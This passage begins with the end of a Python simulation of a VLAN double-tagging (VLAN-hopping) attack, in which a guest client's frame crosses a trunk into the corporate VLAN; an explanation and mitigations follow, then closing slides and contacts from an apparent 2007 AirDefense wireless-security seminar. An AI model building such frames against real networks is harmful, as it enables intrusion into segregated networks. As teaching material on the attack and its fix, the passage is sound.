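VICTIM = bytes.fromhex("000c29aabbcc")
GUEST_VLAN, CORP_VLAN = 10, 20   # guest SSID -> VLAN 10, which is also the trunk's native VLAN


def attacker_frame() -> bytes:
    """Outer tag = native/guest VLAN, inner tag = corporate VLAN."""
    plain = ethernet(VICTIM, ATTACKER, ETHERTYPE_IPV4, b"constructed IPv4 payload")
    return push_tag(push_tag(plain, CORP_VLAN), GUEST_VLAN)


def demo():
    """Same frame against a default trunk and a trunk that tags its native VLAN."""
    return {
        "default": cross_trunk(attacker_frame(), GUEST_VLAN),
        "tag_native": cross_trunk(attacker_frame(), GUEST_VLAN, tag_native=True),
    }


if __name__ == "__main__":
    print(demo())
```

With the default trunk the guest client's frame is delivered into VLAN 20 (Corp); when the native VLAN is tagged on the trunk, switch 2 pops that tag and the inner one stays in the payload, so the frame lands in VLAN 10. The attack is one-way (the victim's replies go back into its own VLAN), which is enough for injection but not for a session. The mitigations the model reflects are tagging the native VLAN on trunks and never mapping a user or guest SSID to the trunk's native VLAN.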
Slide 47: Wireless Security Cannot Mitigate Flawed Risks
- It's the Internet all over again: Telnet, FTP, HTTP; we still use them.
- Risk vs. threats.
- SHARED MEDIUM: easy compromise.
- Remediation is key. Monitoring is key.

Slide 48: Summary
- Wireless is a business enabler and part of every network.
- Unmonitored wireless networks make the entire network infrastructure vulnerable.
- Lack of policy compliance can result in regulatory liabilities.
- AirDefense offers market-leading solutions to provide visibility and control of all wireless assets, regardless of location.
- AirDefense solutions are trusted by the most security-sensitive organizations in the world.
- AirDefense solutions are cost-effective and provide the lowest TCO.

Slide 49: Contact Us
Web: www.AirDefense.NET; HQ phone: 770-663-8115. A demo of the laptop products is available on www.AirDefense.NET.
Contact: Anthony Perridge, Vice President, International, aperridge@airdefense.net, +44 1628 509058
http://www.airdefense.net/seminars/airdefense_europe_oct_2007.pdf